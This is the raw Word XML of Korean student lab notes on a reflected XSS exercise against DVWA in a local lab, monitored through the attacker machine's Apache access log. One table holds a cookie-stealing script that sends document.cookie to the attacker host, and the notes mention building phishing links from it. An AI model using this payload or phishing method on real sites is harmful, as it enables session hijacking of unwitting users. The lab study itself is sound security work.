    <w:p w14:paraId="29745F45" w14:textId="11E503C8" w:rsidR="00C37311" w:rsidRDefault="00C37311" w:rsidP="00C37311">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37311">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19CED857" wp14:editId="1C3FDDF2">
            <wp:extent cx="4758267" cy="5011957"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="1429095456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95456" name="그림 1" descr="텍스트, 전자제품, 스크린샷,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7140" cy="502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1AA6" w14:textId="77777777" w:rsidR="00C37311" w:rsidRDefault="00C37311" w:rsidP="00C37311">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="4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- 칼리 리눅스의 현재 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 주소는 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD4AB7A" w14:textId="0C1C3AC5" w:rsidR="00C37311" w:rsidRDefault="00C37311" w:rsidP="000C5481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서버가 제대로 시작되었다면 웹 브라우저로 접속했을 때, 위와 같은 화면 표시됨</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7D1825" w14:textId="5D1435B5" w:rsidR="00C37311" w:rsidRDefault="00C37311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BC1AB13" w14:textId="17A299FA" w:rsidR="00EE5EFB" w:rsidRDefault="00EE5EFB" w:rsidP="00EE5EFB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE5EFB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53F9D3C0" wp14:editId="66E89C18">
            <wp:extent cx="5588431" cy="766233"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="115471593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15938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5945" cy="76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1CDC" w14:textId="5184218D" w:rsidR="00EE5EFB" w:rsidRDefault="00EE5EFB" w:rsidP="00EE5EFB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실습 중 로그 파일 모니터링을 위한 명령어</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B39C0DE" w14:textId="32807D84" w:rsidR="00EE5EFB" w:rsidRDefault="00EE5EFB" w:rsidP="00EE5EFB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access.log 파일은 접근 로그를 기록하는 파일 -&gt; 웹 서버로 들어온 요청 정보 기록</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381F1F92" w14:textId="77777777" w:rsidR="00102E31" w:rsidRDefault="00102E31" w:rsidP="00EE5EFB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68AFAD0C" w14:textId="368E9767" w:rsidR="00102E31" w:rsidRDefault="00102E31" w:rsidP="00102E31">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="4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- DVWA 실습 페이지 입력란에 아래와 같은 스크립트 입력</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="aa"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="440" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10016"/>
      </w:tblGrid>
      <w:tr w:rsidR="00102E31" w14:paraId="127E70D6" w14:textId="77777777" w:rsidTr="00102E31">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="483E20D5" w14:textId="6E0EBC6A" w:rsidR="00102E31" w:rsidRPr="00102E31" w:rsidRDefault="00102E31" w:rsidP="00EE5EFB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&lt;script&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>document.location</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/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>http://192.168.56.103/cookie?</w:t>
            </w:r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>+document.cookie&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72787805" w14:textId="7B62C243" w:rsidR="00102E31" w:rsidRDefault="00FB70E3" w:rsidP="00EE5EFB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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 이용하여 지정한 위치로 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>리다이렉트</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6786C5CF" w14:textId="640E0A2B" w:rsidR="00FB70E3" w:rsidRDefault="00FB70E3" w:rsidP="00EE5EFB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스크립트 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>실행시</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, 웹 브라우저는 공격자의 호스트로 접속</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E489B18" w14:textId="77777777" w:rsidR="008123FE" w:rsidRDefault="008123FE" w:rsidP="00EE5EFB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E85C806" w14:textId="0C7AB013" w:rsidR="008123FE" w:rsidRDefault="008123FE" w:rsidP="008123FE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008123FE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59C17290" wp14:editId="603A17B2">
            <wp:extent cx="5020733" cy="717179"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="758531935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531935" name="그림 1" descr="텍스트, 스크린샷, 폰트, 라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0518" cy="72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5E17" w14:textId="77777777" w:rsidR="00FB70E3" w:rsidRDefault="00FB70E3" w:rsidP="00EE5EFB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요청 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>전송시</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>리다이렉트</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 후 에러 발생 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AD7969" w14:textId="053539D3" w:rsidR="00FB70E3" w:rsidRDefault="00FB70E3" w:rsidP="00FB70E3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440" w:firstLineChars="100" w:firstLine="2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-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>리다이렉트</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 된 cookie라는 URL이 공격자의 호스트에 존재하지 않기 때문 -&gt; 상관 X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C155A9F" w14:textId="1700C03A" w:rsidR="00FB70E3" w:rsidRDefault="008123FE" w:rsidP="008123FE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220" w:firstLine="198"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008123FE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44BEA567" wp14:editId="139FEDBC">
            <wp:extent cx="5490634" cy="1046085"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="631771521" name="그림 1" descr="텍스트, 스크린샷, 폰트, 정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71521" name="그림 1" descr="텍스트, 스크린샷, 폰트, 정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9541" cy="105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DC01B" w14:textId="77777777" w:rsidR="008123FE" w:rsidRDefault="008123FE" w:rsidP="008123FE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해당 실습에서는 접근 로그가 중요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409FACEA" w14:textId="77777777" w:rsidR="008123FE" w:rsidRDefault="008123FE" w:rsidP="008123FE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440" w:firstLine="198"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt; 모니터링하고 있던 접근 로그를 살펴보면 새로운 내용 기록된 것을 확인 가능</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A287B58" w14:textId="1DB8C051" w:rsidR="008123FE" w:rsidRDefault="008123FE" w:rsidP="00FB70E3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220" w:firstLine="198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새로운 로그 중 GET /cookie? 문자열 이후 나오는 내용이 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에 의해 출력된 쿠키 정보</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BEF6F6" w14:textId="47B2DFEC" w:rsidR="008123FE" w:rsidRDefault="008123FE" w:rsidP="00FB70E3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220" w:firstLine="198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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B93B81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>리플렉티드</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B93B81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 크로스 사이트 스크립트는 위와 같이 직접 입력보다는 피싱을 통해 정보 탈취</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60605A00" w14:textId="462D6651" w:rsidR="00B93B81" w:rsidRDefault="00B93B81" w:rsidP="00B93B81">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220"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-&gt; 사용자가 취약점이 있는 링크를 클릭하게 만드는 것</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D25963" w14:textId="232DCC3E" w:rsidR="00B93B81" w:rsidRDefault="00B93B81" w:rsidP="00B93B81">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220"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-&gt; Burp Suite의 Proxy 히스토리를 이용해 링크를 확인 가능</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD2A42C" w14:textId="4EBFBE5F" w:rsidR="00B93B81" w:rsidRDefault="00B93B81" w:rsidP="00B93B81">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220"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-&gt; 이 요청 메시지를 이용하여 피싱에 사용할 링크 만들 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFBFAE3" w14:textId="0A458C76" w:rsidR="00B93B81" w:rsidRDefault="00B93B81" w:rsidP="00B93B81">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220" w:firstLineChars="200" w:firstLine="400"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B1B01A" w14:textId="77777777" w:rsidR="00B93B81" w:rsidRPr="00B93B81" w:rsidRDefault="00B93B81" w:rsidP="00B93B81">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B93B81" w:rsidRPr="00B93B81" w:rsidSect="00911FC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141"/>
    <w:rsid w:val="000B200A"/>
    <w:rsid w:val="000C5481"/>
    <w:rsid w:val="000E41F3"/>
    <w:rsid w:val="00102E31"/>
    <w:rsid w:val="00152476"/>
    <w:rsid w:val="00182C61"/>
    <w:rsid w:val="001C2921"/>
    <w:rsid w:val="002875BD"/>
    <w:rsid w:val="002A404B"/>
    <w:rsid w:val="002B4141"/>
    <w:rsid w:val="005079E7"/>
    <w:rsid w:val="0063084A"/>
    <w:rsid w:val="00672D66"/>
    <w:rsid w:val="008123FE"/>
    <w:rsid w:val="00906155"/>
    <w:rsid w:val="00911FCE"/>
    <w:rsid w:val="009D0A83"/>
    <w:rsid w:val="009E7E5E"/>
    <w:rsid w:val="00B76007"/>
    <w:rsid w:val="00B93B81"/>
    <w:rsid w:val="00BE3C83"/>
    <w:rsid w:val="00C1370D"/>
    <w:rsid w:val="00C37311"/>
    <w:rsid w:val="00EE5EFB"/>
    <w:rsid w:val="00FA069C"/>
    <w:rsid w:val="00FB70E3"/>
    <w:rsid w:val="00FD17D9"/>
    <w:rsid w:val="00FE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3B919"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AC1651E6-435D-4F75-BEC2-F5268C39A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B414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B4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B414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B414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B414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B414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B414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B414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B414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B414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B414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B414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B41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B41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B41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B41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B41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B414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B414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B4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B414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B414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B4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B414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B414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B414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B41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B414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B414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02E3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권순형/컴퓨터공학부</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>권순형/컴퓨터공학부</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-18T14:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-21T14:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>